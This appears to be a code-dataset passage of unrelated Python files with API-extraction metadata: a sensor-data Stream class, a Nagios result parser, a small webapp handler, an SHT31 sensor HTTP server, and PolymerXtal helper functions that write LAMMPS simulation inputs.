return self._identifier
@property
def user(self):
return self._owner
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def data_descriptor(self):
return self._data_descriptor
@data_descriptor.setter
def data_descriptor(self, value):
self._data_descriptor = value
@property
def execution_context(self):
return self._execution_context
@execution_context.setter
def execution_context(self, value):
self._execution_context = value
@property
def datastream_type(self):
return self._datastream_type
@property
def data(self):
return self._data
@data.setter
def data(self, value):
result = []
for dp in value:
result.append(DataPoint(self._identifier, dp.start_time, dp.end_time, dp.sample))
self._data = result
@classmethod
def from_datastream(cls, input_streams: List):
        result = cls(owner=input_streams[0].user)  # __init__ takes "owner"; the "user" property reads it back
# TODO: Something with provenance tracking from datastream list
return result
def __str__(self):
return str(self.identifier) + " - " + str(self.user) + " - " + str(self.data)
def __repr__(self):
result = "Stream(" + ', '.join(map(str, [self.identifier,
self.user,
self.name,
self.description,
self.data_descriptor,
self.datastream_type,
self.execution_context,
self.annotations]))
return result
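# A hedged usage sketch, not part of the original module; the identifiers and
# names below are illustrative placeholders.
if __name__ == '__main__':
    import uuid
    stream = Stream(identifier=uuid.uuid4(), owner=uuid.uuid4(),
                    name='accel-example', annotations=[])
    print(stream.find_annotation_references(name='labels'))  # -> []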
|
[
"cerebralcortex.kernel.datatypes.datapoint.DataPoint"
] |
[((4028, 4094), 'cerebralcortex.kernel.datatypes.datapoint.DataPoint', 'DataPoint', (['self._identifier', 'dp.start_time', 'dp.end_time', 'dp.sample'], {}), '(self._identifier, dp.start_time, dp.end_time, dp.sample)\n', (4037, 4094), False, 'from cerebralcortex.kernel.datatypes.datapoint import DataPoint\n')]
|
#!/usr/bin/env python2.7
import time
def nagios_from_file(results_file):
"""Returns a nagios-appropriate string and return code obtained by
parsing the desired file on disk. The file on disk should be of format
%s|%s % (timestamp, nagios_string)
This file is created by various nagios checking cron jobs such as
check-rabbitmq-queues and check-rabbitmq-consumers"""
data = open(results_file).read().strip()
pieces = data.split('|')
    if len(pieces) != 4:
state = 'UNKNOWN'
ret = 3
data = "Results file malformed"
else:
timestamp = int(pieces[0])
time_diff = time.time() - timestamp
if time_diff > 60 * 2:
ret = 3
state = 'UNKNOWN'
data = "Results file is stale"
else:
ret = int(pieces[1])
state = pieces[2]
data = pieces[3]
return (ret, "%s: %s" % (state, data))
|
[
"time.time"
] |
[((642, 653), 'time.time', 'time.time', ([], {}), '()\n', (651, 653), False, 'import time\n')]
|
import webapp2
from template import template
class Handler(webapp2.RequestHandler):
def get(self):
        params = {}
self.response.write(template("bigboard.html", params))
|
[
"template.template"
] |
[((136, 169), 'template.template', 'template', (['"""bigboard.html"""', 'params'], {}), "('bigboard.html', params)\n", (144, 169), False, 'from template import template\n')]
|
from http.server import BaseHTTPRequestHandler, HTTPServer
from grove.grove_temperature_humidity_sensor_sht3x import GroveTemperatureHumiditySensorSHT3x
import os
import json
class SHT31Handler(BaseHTTPRequestHandler):
sensor = GroveTemperatureHumiditySensorSHT3x()
def do_GET(self):
temperature, humidity = self.sensor.read()
        res = dict(temperature=round(temperature, 1),
                   humidity=round(humidity, 1))
self.send_response(200)
self.send_header("Content-type", "text/json")
self.end_headers()
self.wfile.write(json.dumps(res).encode())
def main():
host = os.getenv("HOST", "0.0.0.0")
port = int(os.getenv("PORT", "80"))
httpd = HTTPServer((host, port), SHT31Handler)
httpd.serve_forever()
if __name__ == '__main__':
main()
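# Usage sketch (an assumption, not from the original source): with the server
# running on the device, a GET to any path returns the current reading, e.g.
#   curl http://<device-ip>/  ->  {"temperature": 23.4, "humidity": 41.0}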
|
[
"grove.grove_temperature_humidity_sensor_sht3x.GroveTemperatureHumiditySensorSHT3x",
"http.server.HTTPServer",
"os.getenv",
"json.dumps"
] |
[((269, 306), 'grove.grove_temperature_humidity_sensor_sht3x.GroveTemperatureHumiditySensorSHT3x', 'GroveTemperatureHumiditySensorSHT3x', ([], {}), '()\n', (304, 306), False, 'from grove.grove_temperature_humidity_sensor_sht3x import GroveTemperatureHumiditySensorSHT3x\n'), ((705, 733), 'os.getenv', 'os.getenv', (['"""HOST"""', '"""0.0.0.0"""'], {}), "('HOST', '0.0.0.0')\n", (714, 733), False, 'import os\n'), ((787, 825), 'http.server.HTTPServer', 'HTTPServer', (['(host, port)', 'SHT31Handler'], {}), '((host, port), SHT31Handler)\n', (797, 825), False, 'from http.server import BaseHTTPRequestHandler, HTTPServer\n'), ((749, 772), 'os.getenv', 'os.getenv', (['"""PORT"""', '"""80"""'], {}), "('PORT', '80')\n", (758, 772), False, 'import os\n'), ((654, 669), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (664, 669), False, 'import json\n')]
|
"""
functions.py
In this work, we present PolymerXtal, a software designed to build and analyze molecular-level polymer crystal
structures. PolymerXtal provides a standardized process to generate polymer crystal structure based on monomer,
tacticity, helicity, chiriality and unit cell information and analyze the crystallinity in polymer systems with given
atom trajectories. These features have allowed PolymerXtal to lead further investigations of semi-crystalline polymers
where the birthplace of the important physics in play and promote future research endeavors in the area of crystalline
polymer simulations.
Handles the primary functions
"""
import os, sys, os.path # , math # noqa: E401
# import shutil
import numpy as np
def calc_polymer(mass, nm, polymer_type, p_fra, custom=0):
p = polymer_type.split("-")[0]
wunits = {
"PS": 104.1,
"PE": 28.0516,
"PMMA": 100.117,
"PP": 42.0804,
"POM": 30.0262,
"PTFE": 100.0156,
"PVC": 62.4987,
}
if p == "custom":
wunit = custom
else:
wunit = wunits[p]
m_polymer = (mass * p_fra) / (1 - p_fra)
dp = int(m_polymer / wunit)
nc = dp / nm
print("Degree of polymerization: ", dp, "Chains: ", nc)
return nc
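# A worked example with illustrative values: coating a 1e6 g grain with 5 wt%
# polystyrene at 40 monomers per chain gives
#   m_polymer = 1e6 * 0.05 / 0.95 ~= 52631.6, dp = int(52631.6 / 104.1) = 505,
#   nc = 505 / 40 = 12.625
# i.e. calc_polymer(1e6, 40, "PS", 0.05) returns 12.625.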
def parameters(periodic, cell, coord, boundaries, radius):
shift = {}
if periodic == "x":
lx = cell["x"][2]
ly = (boundaries["y"][0] + radius) - (boundaries["y"][1] - radius)
lz = (boundaries["z"][0] + radius) - (boundaries["z"][1] - radius)
shift["y"] = boundaries["y"][1] - radius
shift["z"] = boundaries["z"][1] - radius
dx = 1
dy = 0
dz = 0
# cx = -lx
# cy = coord["y"] - shift["y"]
# cz = coord["z"] - shift["z"]
lc = lx
length = [lx, 4 * radius, 4 * radius]
cylinder_p = [-100, 2 * radius, 2 * radius]
elif periodic == "y":
lx = (boundaries["x"][0] + radius) - (boundaries["x"][1] - radius)
ly = cell["y"][2]
lz = (boundaries["z"][0] + radius) - (boundaries["z"][1] - radius)
shift["x"] = boundaries["x"][1] - radius
shift["z"] = boundaries["z"][1] - radius
dx = 0
dy = 1
dz = 0
print(coord, shift)
# cx = coord["x"] - shift["x"]
# cy = -ly
# cz = coord["z"] - shift["z"]
lc = ly
length = [4 * radius, ly, 4 * radius]
cylinder_p = [2 * radius, -100, 2 * radius]
else:
lx = (boundaries["x"][0] + radius) - (boundaries["x"][1] - radius)
ly = (boundaries["y"][0] + radius) - (boundaries["y"][1] - radius)
lz = cell["z"][2]
shift["x"] = boundaries["x"][1] - radius
shift["y"] = boundaries["y"][1] - radius
dx = 0
dy = 0
dz = 1
# cx = coord["x"] - shift["x"]
# cy = coord["y"] - shift["y"]
# cz = -lz
lc = lz
length = [4 * radius, 4 * radius, lz]
cylinder_p = [2 * radius, 2 * radius, -100]
cylinder_d = [dx, dy, dz]
print("Polymod cell: ", length) # , 'Shift cell: ', shift)
return shift, length, cylinder_p, cylinder_d, lc
def run_data4lammps(charge, ffname, cell):
directory = "./data4lammps/"
path_r = os.path.join(directory, "main.py")
path_2 = os.path.join(directory, "doAtomTyping.py")
new_typing_command = "python3.6 {0} {1}".format(path_2, ffname)
data4lammps_command = "python {0} {1} {2} {3} {4} {5} {6} {7}".format(
path_r, 0, cell[0], 0, cell[1], 0, cell[2], charge
)
return new_typing_command, data4lammps_command
def read_dump(ifile, multiframe=0):
Dir = {}
src = open(ifile)
current = ""
timestep = 0
for line in src.readlines():
ln = line.split()
if ln[0] == "ITEM:":
if ln[1] == "TIMESTEP" or ln[1] == "BOX" or ln[1] == "ATOMS":
current = ln[1]
if ln[1] == "BOX":
Dir[timestep][current] = []
if ln[1] == "ATOMS":
Dir[timestep][current] = {}
Dir[timestep][current]["id"] = 0
dump = {}
for i, j in enumerate(ln[2:]):
dump[i] = j
if ln[1:] == "NUMBER OF ATOMS".split():
current = "NUMBER OF ATOMS"
continue
if current == "TIMESTEP":
timestep = eval(ln[0])
if timestep not in Dir:
Dir[timestep] = {}
if current == "NUMBER OF ATOMS":
Dir[timestep][current] = eval(ln[0])
if current == "BOX":
Dir[timestep][current] += [eval(i) for i in ln]
if current == "ATOMS":
cid = Dir[timestep][current]["id"]
Dir[timestep][current][cid] = {}
for i, j in enumerate(
                [(eval(k) if k[0].isdigit() or k[0] == "-" else k) for k in ln]
):
Dir[timestep][current][cid][dump[i]] = j
Dir[timestep][current]["id"] += 1
return Dir
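# Returned layout (inferred from the parser above):
#   Dir[timestep]["NUMBER OF ATOMS"] -> int
#   Dir[timestep]["BOX"]             -> flat list of box bounds
#   Dir[timestep]["ATOMS"][i]        -> {column_name: value, ...} per atom
#   Dir[timestep]["ATOMS"]["id"]     -> running count of atoms parsed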
# def dump2data(datafile, dumpfile, ofile):
# Dir = read_data(datafile)
# if "Velocities" not in Dir:
# Dir["Velocities"] = {}
# src = open(dumpfile)
# box = "x"
# for line in src.readlines():
# ln = line.split()
# if len(ln) == 2 and ln[0] != "ITEM:":
# Dir[box + "lo"] = eval(ln[0])
# Dir[box + "hi"] = eval(ln[1])
# if box == "x":
# box = "y"
# continue
# if box == "y":
# box = "z"
# continue
# continue
# if len(ln) == 8:
# Dir["Atoms"][eval(ln[0])][3] = eval(ln[2])
# Dir["Atoms"][eval(ln[0])][4] = eval(ln[3])
# Dir["Atoms"][eval(ln[0])][5] = eval(ln[4])
# Dir["Atoms"][eval(ln[0])][6] = 0
# Dir["Atoms"][eval(ln[0])][7] = 0
# Dir["Atoms"][eval(ln[0])][8] = 0
# if eval(ln[0]) not in Dir['Velocities']:
# Dir['Velocities'][eval(ln[0])]=[]
# Dir['Velocities'][eval(ln[0])].append(eval(ln[5]))
# Dir['Velocities'][eval(ln[0])].append(eval(ln[6]))
# Dir['Velocities'][eval(ln[0])].append(eval(ln[7]))
# Dir['Velocities'][eval(ln[0])][0]=eval(ln[5])
# Dir['Velocities'][eval(ln[0])][1]=eval(ln[6])
# Dir['Velocities'][eval(ln[0])][2]=eval(ln[7])
# if len(ln)==11:
# Dir['Atoms'][eval(ln[0])][3]=eval(ln[2])
# Dir['Atoms'][eval(ln[0])][4]=eval(ln[3])
# Dir['Atoms'][eval(ln[0])][5]=eval(ln[4])
# Dir['Atoms'][eval(ln[0])][6]=eval(ln[8])
# Dir['Atoms'][eval(ln[0])][7]=eval(ln[9])
# Dir['Atoms'][eval(ln[0])][8]=eval(ln[10])
# if eval(ln[0]) not in Dir['Velocities']:
# Dir['Velocities'][eval(ln[0])]=[]
# Dir['Velocities'][eval(ln[0])].append(eval(ln[5]))
# Dir['Velocities'][eval(ln[0])].append(eval(ln[6]))
# Dir['Velocities'][eval(ln[0])].append(eval(ln[7]))
# Dir['Velocities'][eval(ln[0])][0]=eval(ln[5])
# Dir['Velocities'][eval(ln[0])][1]=eval(ln[6])
# Dir['Velocities'][eval(ln[0])][2]=eval(ln[7])
# src.close()
# write_data(Dir, ofile)
def write_data(Dir, ofile, v=1, a=0):
des = open(ofile, "w")
des.write("LAMMPS data file via Tongtong\n")
des.write("\n")
if a:
ilist = ["atom"]
List = ["Masses", "Atoms", "Velocities"]
else:
ilist = ["atom", "bond", "angle", "dihedral", "improper"]
List = [
"Masses",
"Pair Coeffs",
"Bond Coeffs",
"Angle Coeffs",
"Dihedral Coeffs",
"Improper Coeffs",
"Atoms",
"Velocities",
"Bonds",
"Angles",
"Dihedrals",
"Impropers",
]
for i in ilist:
if (i + "s") in Dir:
des.write("%d %s\n" % (Dir[i + "s"], (i + "s")))
des.write("%d %s\n" % (Dir[i + " types"], (i + " types")))
des.write("\n")
for i in ["x", "y", "z"]:
des.write(
"%f %f %s %s\n" % (Dir[i + "lo"], Dir[i + "hi"], (i + "lo"), (i + "hi"))
)
des.write("\n")
if v == 0:
List.remove("Velocities")
for key in List:
if key in Dir and len(Dir[key]) > 0:
des.write(key + "\n")
des.write("\n")
for i in Dir[key]:
des.write(str(i) + " " + " ".join(str(j) for j in Dir[key][i]) + "\n")
des.write("\n")
des.close()
def input_coat4(na, cpos, idata, odata):
des = open("run_coat4.in", "w")
des.write("# General parameters\n")
des.write("units real\n")
des.write("atom_style full\n")
des.write("boundary p p p\n")
des.write("special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("dielectric 1.0\n")
des.write("pair_style lj/cut/coul/long 12.0\n")
des.write("bond_style harmonic\n")
des.write("angle_style harmonic\n")
des.write("dihedral_style harmonic\n")
des.write("improper_style harmonic\n")
des.write("kspace_style pppm 1.0e-6\n")
des.write("\n")
des.write("read_data %s\n" % idata)
des.write("\n")
des.write("thermo_style custom temp vol density pxx pyy pzz lx ly lz\n")
des.write("thermo 100\n")
des.write("thermo_modify flush yes line multi\n")
des.write("\n")
des.write("dump 1 all atom 500 coat2.dump\n")
des.write("\n")
des.write("label loopa\n")
des.write("variable i loop %d\n" % na)
des.write(" variable k equal $i\n")
des.write(" variable h equal x[$k]\n")
des.write(" variable p equal y[$k]\n")
des.write(' print "x= $h"\n')
des.write(' print "y= $p"\n')
des.write(" variable dx equal $h-%f\n" % cpos[0])
des.write(" variable dy equal $p-%f\n" % cpos[1])
des.write(" variable dr equal sqrt(${dx}*${dx}+${dy}*${dy})\n")
des.write(" variable nvx equal -${dx}/${dr}*0.01\n")
des.write(" variable nvy equal -${dy}/${dr}*0.01\n")
des.write(" set atom $k vx ${nvx} vy ${nvy} vz 0.0\n")
des.write("next i\n")
des.write("jump SELF loopa\n")
des.write("\n")
des.write("write_data %s\n" % odata)
des.write("\n")
des.close()
# with open('coat4.in', 'r') as file:
# filedata = file.read()
# Replace the target string
# filedata = filedata.replace('na', str(na))
# filedata = filedata.replace('ccx', str(cpos[0]))
# filedata = filedata.replace('ccy', str(cpos[1]))
# filedata = filedata.replace('idata', idata)
# filedata = filedata.replace('odata', odata)
# Write the file out again
# with open('run_coat4.in', 'w') as file:
# file.write(filedata)
def input_coat5(cpos, radius, oradius, idata, odata, tstep, X6paircoeffs, mctemp):
des = open("run_coat5.in", "w")
des.write("# General parameters\n")
des.write("units real\n")
des.write("atom_style full\n")
des.write("boundary p p p\n")
des.write("special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("dielectric 1.0\n")
des.write("#pair_style lj/cut/coul/long 12.0\n")
des.write("pair_style buck/coul/cut 10.0\n")
des.write("bond_style harmonic\n")
des.write("angle_style harmonic\n")
des.write("dihedral_style harmonic\n")
des.write("improper_style harmonic\n")
des.write("\n")
des.write("read_data %s\n" % idata)
des.write("\n")
src = open(X6paircoeffs)
for line in src.readlines():
des.write(line)
src.close()
des.write("\n")
des.write("thermo_style custom temp vol density pxx pyy pzz lx ly lz\n")
des.write("thermo 100\n")
des.write("thermo_modify flush yes line one\n")
des.write("\n")
des.write(
"region inner cylinder z %f %f %f INF INF units box side out\n"
% (cpos[0], cpos[1], radius - 2)
)
des.write(
"region outter cylinder z %f %f %f INF INF units box side in\n"
% (cpos[0], cpos[1], oradius + 3.5)
)
des.write("\n")
des.write("comm_style tiled\n")
des.write("fix LB all balance 1000 1.1 rcb\n")
des.write("\n")
des.write("fix 1 all wall/region inner lj126 5.0 3.5 12.0\n")
des.write("fix 8 all wall/region outter lj126 5.0 3.5 3.5\n")
des.write("\n")
des.write("fix 2 all nvt temp %f %f 100 \n" % (mctemp, mctemp))
des.write("\n")
des.write("reset_timestep %d\n" % tstep)
des.write("\n")
des.write("dump 1 all atom 500 coat5.*.dump\n")
des.write("\n")
des.write("run 5000\n")
des.write("write_data %s\n" % odata)
des.write("\n")
des.close()
# with open('coat5.in', 'r') as file:
# filedata = file.read()
# Replace the target string
# filedata = filedata.replace('ccx', str(cpos[0]))
# filedata = filedata.replace('ccy', str(cpos[1]))
# filedata = filedata.replace('radius', str(radius-2))
# filedata = filedata.replace('oadius', str(oradius+3.5))
# filedata = filedata.replace('idata', idata)
# filedata = filedata.replace('odata', odata)
# filedata = filedata.replace('tstep', str(tstep))
# Write the file out again
# with open('run_coat5.in', 'w') as file:
# file.write(filedata)
def input_coat6(na, idata, odata):
des = open("run_coat6.in", "w")
des.write("# General parameters\n")
des.write("units real\n")
des.write("atom_style full\n")
des.write("boundary p p p\n")
des.write("#special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("#dielectric 1.0\n")
des.write("#pair_style lj/cut/coul/long 12.0\n")
des.write("#bond_style harmonic\n")
des.write("#angle_style harmonic\n")
des.write("#improper_style harmonic\n")
des.write("#kspace_style pppm 1.0e-6\n")
des.write("\n")
des.write("read_data %s\n" % idata)
des.write("\n")
des.write("thermo_style custom temp vol density pxx pyy pzz lx ly lz\n")
des.write("thermo 100\n")
des.write("thermo_modify flush yes line multi\n")
des.write("\n")
des.write("dump 1 all atom 500 coat2.dump\n")
des.write("\n")
des.write("label loopa\n")
des.write("variable i loop %d\n" % na)
des.write(" variable k equal $i\n")
des.write(" variable h equal x[$k]\n")
des.write(" variable p equal y[$k]\n")
des.write(' print "x= $h"\n')
des.write(' print "y= $p"\n')
des.write(" variable dx equal $h \n")
des.write(" variable dy equal $p \n")
des.write(" variable dr equal sqrt(${dx}*${dx}+${dy}*${dy})\n")
des.write(" variable nvx equal -${dx}/${dr}*0.001\n")
des.write(" variable nvy equal -${dy}/${dr}*0.001\n")
des.write(" set atom $k vx ${nvx} vy ${nvy} vz 0.0\n")
des.write("next i\n")
des.write("jump SELF loopa\n")
des.write("\n")
des.write("write_data %s\n" % odata)
des.write("\n")
des.close()
# with open('coat6.in', 'r') as file:
# filedata = file.read()
# Replace the target string
# filedata = filedata.replace('na', str(na))
# filedata = filedata.replace('idata', idata)
# filedata = filedata.replace('odata', odata)
# Write the file out again
# with open('run_coat6.in', 'w') as file:
# file.write(filedata)
def input_coat7(oradius, idata, odata, tstep, polymer_type, HE_type, mctemp):
des = open("run_coat7.in", "w")
des.write("newton on\n")
des.write("boundary p p p\n")
des.write("units real\n")
des.write("box tilt large\n")
des.write("\n")
des.write("include ../potential_head.mod\n")
des.write("read_data %s\n" % idata)
des.write("\n")
des.write("group polymer type 1:%d\n" % polymer_type)
des.write("group HE type %d:%d\n" % (polymer_type + 1, HE_type + polymer_type))
des.write("\n")
des.write("include potential.mod\n")
des.write("\n")
des.write(" compute stress all stress/atom NULL\n")
des.write(" compute PEbond all pe/atom bond\n")
des.write(" compute PEangle all pe/atom angle\n")
des.write(
" compute PEdihed all pe/atom dihedral\n"
)
des.write(" compute PEimp all pe/atom improper\n")
des.write(" compute PEinter all pe/atom pair\n")
des.write("\n")
des.write(
"thermo_style custom step time etotal pe ke temp press pxx pyy pzz pxy pxz pyz density evdwl ecoul epair \
ebond eangle edihed eimp lx ly evdwl\n"
)
des.write("thermo 5\n")
des.write("\n")
des.write("#-------------------------------------------------------------\n")
des.write("# SIMULATION SETUP\n")
des.write("#-------------------------------------------------------------\n")
des.write("#\n")
des.write("\n")
des.write("comm_style tiled\n")
des.write("fix 2 all balance 1000 1.1 rcb\n")
des.write("\n")
des.write("run_style verlet\n")
des.write("\n")
des.write(
"region outter cylinder z 0.0 0.0 %f INF INF units box side in\n"
% (oradius + 3.5)
)
des.write("\n")
des.write(
"fix 6 HE rigid group 1 HE force * off off off torque * off off off\n"
)
des.write("fix 7 polymer nvt temp %f %f 50\n" % (mctemp, mctemp))
des.write("fix 8 all wall/region outter lj126 5.0 3.5 3.5\n")
des.write("dump 1 all atom 500 coat7.*.dump\n")
des.write("\n")
des.write("reset_timestep %d\n" % tstep)
des.write("\n")
des.write("run 5000\n")
des.write("unfix 6\n")
des.write("unfix 7\n")
des.write("\n")
des.write("write_data %s\n" % odata)
des.write("\n")
des.close()
# with open('coat7.in', 'r') as file:
# filedata = file.read()
# Replace the target string
# filedata = filedata.replace('oadius', str(oradius+3.5))
# filedata = filedata.replace('idata', idata)
# filedata = filedata.replace('odata', odata)
# filedata = filedata.replace('tstep', str(tstep))
# filedata = filedata.replace('polymer_type', ('1:%d' %polymer_type))
# filedata = filedata.replace('HE_type', ('%d:%d' %(polymer_type+1,HE_type+polymer_type)))
# Write the file out again
# with open('run_coat7.in', 'w') as file:
# file.write(filedata)
def Get_Mass_Radius(Dir, center, dimension=3, plane="xy"):
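    # Returns the maximum atom distance from `center` (an enclosing radius,
    # not a mass-weighted one, despite the name), computed in 3D or
    # restricted to the axes named in `plane`.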
D = 0
if dimension == 3:
for a_id in Dir["Atoms"]:
d = 0
for i in range(3):
d += (Dir["Atoms"][a_id][3 + i] - center[i]) ** 2
if D < d:
D = d
else:
i_range = []
index = {"x": 0, "y": 1, "z": 2}
for xyz in ["x", "y", "z"]:
if xyz in plane:
i_range.append(index[xyz])
for a_id in Dir["Atoms"]:
d = 0
for i in i_range:
d += (Dir["Atoms"][a_id][3 + i] - center[i]) ** 2
if D < d:
D = d
return np.sqrt(D), center
def Get_Center_of_Mass(Dir_ori):
M = 0
Mx = 0
My = 0
Mz = 0
for a_id in Dir_ori["Atoms"]:
m = Dir_ori["Masses"][Dir_ori["Atoms"][a_id][1]][0]
M += m
Mx += m * Dir_ori["Atoms"][a_id][3]
My += m * Dir_ori["Atoms"][a_id][4]
Mz += m * Dir_ori["Atoms"][a_id][5]
return [Mx / M, My / M, Mz / M]
def data_Translation(Dir, vector, box=0):
for a_id in Dir["Atoms"]:
Dir["Atoms"][a_id][3] += vector[0]
Dir["Atoms"][a_id][4] += vector[1]
Dir["Atoms"][a_id][5] += vector[2]
if box:
for i, xyz in enumerate(["x", "y", "z"]):
for lh in ["lo", "hi"]:
Dir[xyz + lh] += vector[i]
return Dir
def add_data(Dir_1, Dir_2, add="append"):
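    # Merges two parsed LAMMPS data dictionaries (inferred from the logic
    # below): counts, types and box bounds are combined, and atom, molecule
    # and type IDs from Dir_2 are offset past Dir_1's ranges so the appended
    # entries stay unique.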
Dir_data = {}
for i in ["atom", "bond", "angle", "dihedral", "improper"]:
if (i + "s") in Dir_1:
Dir_data[i + "s"] = Dir_1[i + "s"]
Dir_data[i + " types"] = Dir_1[i + " types"]
if (i + "s") in Dir_2:
if (i + "s") in Dir_data:
Dir_data[i + "s"] += Dir_2[i + "s"]
Dir_data[i + " types"] += Dir_2[i + " types"]
else:
Dir_data[i + "s"] = Dir_2[i + "s"]
Dir_data[i + " types"] = Dir_2[i + " types"]
if ("extra " + i + " per atom") in Dir_1:
Dir_data["extra " + i + " per atom"] = Dir_1["extra " + i + " per atom"]
if ("extra " + i + " per atom") in Dir_2:
if ("extra " + i + " per atom") in Dir_data:
Dir_data["extra " + i + " per atom"] = max(
Dir_1["extra " + i + " per atom"], Dir_2["extra " + i + " per atom"]
)
else:
Dir_data["extra " + i + " per atom"] = Dir_2["extra " + i + " per atom"]
for i in ["x", "y", "z"]:
if (i + "lo") in Dir_1:
Dir_data[i + "lo"] = Dir_1[i + "lo"]
Dir_data[i + "hi"] = Dir_1[i + "hi"]
if (i + "lo") in Dir_2:
if (i + "lo") not in Dir_data:
Dir_data[i + "lo"] = Dir_2[i + "lo"]
Dir_data[i + "hi"] = Dir_2[i + "hi"]
List = [
"Masses",
"Atoms",
"Velocities",
"Bonds",
"Angles",
"Dihedrals",
"Impropers",
]
for key in List:
if key in Dir_1 and len(Dir_1[key]) > 0:
Dir_data[key] = Dir_1[key]
if key in Dir_2 and len(Dir_2[key]) > 0:
if key in Dir_data:
if key in [
"Masses",
"Atoms",
"Velocities",
"Bonds",
"Angles",
"Dihedrals",
"Impropers",
]:
if key == "Atoms":
a_ids = {}
inimol = max([Dir_data[key][i][0] for i in Dir_data[key]])
ini = max([i for i in Dir_data[key]])
for a_id in Dir_2[key]:
if key == "Atoms":
a_ids[a_id] = ini + a_id
Dir_data[key][ini + a_id] = Dir_2[key][a_id]
if key == "Atoms":
Dir_data[key][ini + a_id][0] = Dir_2[key][a_id][0] + inimol
Dir_data[key][ini + a_id][1] = (
Dir_2[key][a_id][1] + Dir_1["atom types"]
)
if key == "Bonds":
Dir_data[key][ini + a_id][0] = (
Dir_2[key][a_id][0] + Dir_1["bond types"]
)
if key == "Angles":
Dir_data[key][ini + a_id][0] = (
Dir_2[key][a_id][0] + Dir_1["angle types"]
)
if key == "Dihedrals":
Dir_data[key][ini + a_id][0] = (
Dir_2[key][a_id][0] + Dir_1["dihedral types"]
)
if key == "Impropers":
Dir_data[key][ini + a_id][0] = (
Dir_2[key][a_id][0] + Dir_1["improper types"]
)
if key in ["Bonds", "Angles", "Dihedrals", "Impropers"]:
for i in range(1, len(Dir_2[key][a_id])):
Dir_data[key][ini + a_id][i] = a_ids[
Dir_data[key][ini + a_id][i]
]
else:
Dir_data[key] = Dir_2[key]
return Dir_data
# def grabprocessors(ifile):
# src = open(ifile)
# for line in src.readlines():
# ln = line.split()
# if ln and ln[0] == "read_data":
# datafile = ln[1]
# break
# src.close()
# Dir = read_data(datafile)
# atoms = Dir["atoms"]
# if "bonds" in Dir:
# return atoms / 2000 + 1
# else:
# return atoms / 1000 + 1
def correctppn(ppn):
    nodes = ppn // 20 + 1 if (ppn // 20 and ppn % 20) else ppn // 20 if ppn // 20 else 1
    if not ppn // 20:
ppn = (
20
if ppn > 10
else 10
if ppn > 8
else 8
if ppn > 4
else 4
if ppn > 2
else 2
if ppn > 1
else 1
)
    return nodes, 20 if ppn // 20 else ppn, nodes * 20 if ppn // 20 else ppn
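# Worked examples, assuming the 20-core nodes the arithmetic above implies:
#   correctppn(7)  -> (1, 8, 8)    one node, rounded up to a "nice" core count
#   correctppn(45) -> (3, 20, 60)  three nodes, fully packed at 20 cores each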
def shiftpotential(ifile1, ifile2, ofile, Dir_polymer):
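    # Combines two potential files (inferred from the logic below): pair
    # coefficients from ifile1 are rewritten as hybrid "buck" entries, and
    # every type index from ifile2 is shifted past the polymer's type counts
    # so the merged datafile has no collisions.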
src = open(ifile1)
des = open(ofile, "w")
for line in src.readlines():
ln = line.split("#")[0].split()
if ln:
if ln[0] == "pair_coeff":
des.write(" ".join(ln[0:3]) + " buck " + " ".join(ln[3:]) + "\n")
src.close()
src = open(ifile2)
for line in src.readlines():
ln = line.split("#")[0].split()
if ln:
if ln[0] == "pair_coeff":
if ln[1] != "*":
ln[1] = str(eval(ln[1]) + Dir_polymer["atom types"])
if ln[2] != "*":
ln[2] = str(eval(ln[2]) + Dir_polymer["atom types"])
if ln[0] == "bond_coeff":
ln[1] = str(eval(ln[1]) + Dir_polymer["bond types"])
if ln[0] == "angle_coeff":
ln[1] = str(eval(ln[1]) + Dir_polymer["angle types"])
if ln[0] == "dihedral_coeff":
ln[1] = str(eval(ln[1]) + Dir_polymer["dihedral types"])
if ln[0] == "improper_coeff":
ln[1] = str(eval(ln[1]) + Dir_polymer["improper types"])
des.write(" ".join(ln) + "\n")
src.close()
for key in ["Bond", "Angle", "Dihedral", "Improper"]:
if (key + " Coeffs") in Dir_polymer:
for i in Dir_polymer[key + " Coeffs"]:
if key == "Bond":
des.write(
"bond_coeff %i harmonic %s\n"
% (
i,
" ".join([str(k) for k in Dir_polymer[key + " Coeffs"][i]]),
)
)
elif key == "Angle":
des.write(
"angle_coeff %i %s\n"
% (
i,
" ".join([str(k) for k in Dir_polymer[key + " Coeffs"][i]]),
)
)
elif key == "Dihedral":
des.write(
"dihedral_coeff %i %s\n"
% (
i,
" ".join([str(k) for k in Dir_polymer[key + " Coeffs"][i]]),
)
)
elif key == "Improper":
des.write(
"improper_coeff %i %s\n"
% (
i,
" ".join([str(k) for k in Dir_polymer[key + " Coeffs"][i]]),
)
)
des.close()
def addatomtype(ifile, ofile, elementlist):
src = open(ifile)
des = open(ofile, "w")
a = 1
for line in src.readlines():
ln = line.split()
if ln:
des.write(" ".join(ln) + "\n")
a += 1
src.close()
for e in elementlist:
if e == "C":
des.write("%d C_3\n" % a)
else:
des.write("%d %s\n" % (a, e))
a += 1
des.close()
# def writeghostdata(ifile):
# Dir = read_data(ifile)
# write_data(Dir, "ghost_grain.data", v=0, a=1)
def writepolymodfile(polymer_type_custom, ofile1):
mw = {}
des = open(ofile1, "w")
des.write("#\n")
des.write("# PolymerBuilder input file: order of inputs is critical\n")
des.write("#\n")
des.write("\n")
des.write("# Temperature (K)\n")
des.write("mctemp # Temperature (K)\n")
des.write("\n")
des.write("# Elements: atomic type indices for all monomers\n")
des.write(
"%d # Number of atom types\n"
% polymer_type_custom["atom_type"]
)
atom_type = {}
a_id = 0
for i in range(polymer_type_custom["nm"]):
for j in range(len(polymer_type_custom["monomer"][i + 1]["info"])):
if polymer_type_custom["monomer"][i + 1]["info"][j][0] not in atom_type:
a_id += 1
atom_type[a_id] = polymer_type_custom["monomer"][i + 1]["info"][j][0]
atom_type[polymer_type_custom["monomer"][i + 1]["info"][j][0]] = a_id
ofile = open("str2lammps/types/custom_atom_type.dat", "w")
for i in range(polymer_type_custom["atom_type"]):
des.write(
"%s # Type %d element\n"
% (atom_type[i + 1].split("_")[0], (i + 1))
)
ofile.write("%d %s\n" % ((i + 1), atom_type[i + 1]))
ofile.close()
des.write("\n")
des.write("# Number of monomers\n")
des.write("%d # Number of monomer types\n" % polymer_type_custom["nm"])
des.write("\n")
for i in range(polymer_type_custom["nm"]):
